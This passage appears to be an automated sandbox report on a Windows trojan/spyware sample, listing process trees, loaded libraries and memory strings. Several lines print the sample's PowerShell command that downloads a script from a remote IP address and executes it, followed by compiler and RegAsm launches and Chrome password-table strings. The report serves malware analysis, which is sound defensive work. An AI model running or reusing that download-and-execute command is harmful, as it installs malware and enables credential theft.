      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004333D37_2_004333D3
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004353B07_2_004353B0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042AC427_2_0042AC42
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00409C617_2_00409C61
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00424C707_2_00424C70
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043FCC07_2_0043FCC0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00414C807_2_00414C80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042AC857_2_0042AC85
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004364907_2_00436490
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042D4957_2_0042D495
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042AC9C7_2_0042AC9C
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00434D407_2_00434D40
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00429C757_2_00429C75
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004075507_2_00407550
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0042AD527_2_0042AD52
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040F5607_2_0040F560
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004055307_2_00405530
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00423DD07_2_00423DD0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043E5E07_2_0043E5E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004305E07_2_004305E0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040A5F07_2_0040A5F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040B6607_2_0040B660
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004426C87_2_004426C8
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00424ED77_2_00424ED7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004266F07_2_004266F0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004366F77_2_004366F7
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0040DE807_2_0040DE80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_0043FFF07_2_0043FFF0
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_00407F807_2_00407F80
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0040CC90 appears 42 times
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00416FF0 appears 72 times
      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@47/19@5/6
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 7_2_004358F0 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,7_2_004358F0
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Program Files\scoped_dir4212_1753283128Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:304:WilStaging_02
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmr3gpqi.uqi.ps1Jump to behavior
      Source: 7IXl1M9JGV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: chrome.exe, 00000008.00000003.1270861773.000009B402294000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2143908946.000009B402294000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 45;
      Source: chrome.exe, 00000008.00000002.2143602583.000009B4020C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '756F6A466879157E';
      Source: chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1082721228.000009B40172C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137825569.000009B401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969279610.000009B4010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139268132.000009B401370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2144067444.000009B402405000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'AD411B741D0DA012' AND metrics.metric_value > 0;
      Source: chrome.exe, 00000008.00000002.2136823412.000009B400F9C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(metric_value) FROM metrics WHERE metrics.metric_hash = 'CE71BF280B4EB4B5' AND metrics.metric_value > 120;
      Source: chrome.exe, 00000008.00000002.2135416481.000009B400D84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1082721228.000009B40172C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2137825569.000009B401144000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.969279610.000009B4010EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2139268132.000009B401370000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000002.2144067444.000009B402405000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1546757959.000009B400D83000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000008.00000003.1071652311.000009B4017BC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(DISTINCT CAST((event_timestamp / 1000000 / 60 / 10) AS int)) FROM metrics WHERE metrics.metric_hash = 'B4CFE8741404B691' AND metrics.metric_value > 0;
      Source: chrome.exe, 00000008.00000002.2137169781.000009B40103C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '19E16122849E343B';
      Source: chrome.exe, 00000008.00000002.2143240377.000009B401F94000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT COUNT(id) FROM metrics WHERE metrics.metric_hash = '64BD7CCE5A95BF00';
      Source: chrome.exe, 00000008.00000002.2133098922.000009B4008C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: chrome.exe, 00000008.00000002.2140494319.000009B401550000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '79964621D357AB88';
      Source: chrome.exe, 00000008.00000002.2132840549.000009B400848000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SELECT IFNULL(SUM(metrics.metric_value), 0) FROM metrics WHERE metrics.metric_hash = '534661B278B11BD';
      Source: 7IXl1M9JGV.exeReversingLabs: Detection: 13%
      Source: unknownProcess created: C:\Users\user\Desktop\7IXl1M9JGV.exe "C:\Users\user\Desktop\7IXl1M9JGV.exe"
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES267D.tmp" "c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2240,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2252 /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=3808,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=5316 /prefetch:3
      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "iwr -useb 'http://147.45.44.131/infopage/bhdh552.ps1' -Headers @{'X-Special-Header'='qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq'} | iex"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qh4rltex\qh4rltex.cmdline"Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES267D.tmp" "c:\Users\user\AppData\Local\Temp\qh4rltex\CSCE36AEDAA1DED41D2AE2F4E1F8F6B418.TMP"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory="Default"Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2240,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2252 /prefetch:3Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --no-subproc-heap-profiling --field-trial-handle=3808,i,9410338338245658404,8663607227603881870,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=5316 /prefetch:3Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\7IXl1M9JGV.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
